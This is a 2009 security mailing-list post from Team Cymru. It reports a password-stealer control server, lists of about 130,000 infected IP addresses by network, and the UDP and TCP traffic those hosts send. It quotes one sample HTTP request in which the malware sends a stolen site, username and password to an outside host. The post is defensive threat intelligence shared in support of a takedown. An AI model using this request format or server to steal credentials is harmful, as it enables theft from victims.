[nsp-sec] 130K+ Infected Ips on ~3600 ASNs
Stephen Gill
gillsr at cymru.com
Thu Oct 1 13:47:33 EDT 2009
Hi Team,
This password stealer head end IP appears to be quite busy:
76.73.37.250
We're working w/ the ISP on takedown, however in the meantime here is a list
of 130K+ infected Ips seen talking to it primarily via TCP 80 (reporting
stolen credentials) and UDP 7006 - UDP 7012. I don't anticipate an IP
takedown to last forver because they can likely re-route via DNS.
ASN list:
https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt
Infected IP list:
https://www.cymru.com/nsp-sec/Owned/stealer/
eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt
Timestamps in UTC.
Some clarification on the formatting:
3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS -
Massachusetts Institute of Technology
The timestamp column will begin with a U or a T. U is for UDP, T for TCP.
When possible we've preferred to list out a T if we have seen any TCP 80
traffic from the client IP in question.
It looks like the malware on the client may choose its source IP address
since we noticed some RFC 1918 traffic so it is possible the UDP data will
not match in all cases. I cannot guarantee that the UDP traffic is not part
of some type of actual software but it sure looks suspicious. Here is a
public URL for reference:
http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html
As there is UDP involved we cannot guarantee that there are 0 spoofed Ips,
but on the TCP side that is another matter.
HTTP credential stealing looks something like this:
GET
/pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USERNAME&
p=STOLEN_PASSWORD HTTP/1.1
User-Agent: Mozilla/4.0 (compatible).
Host: hotshows.org.
.
Cheers,
-- steve
--
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
More information about the nsp-security
mailing list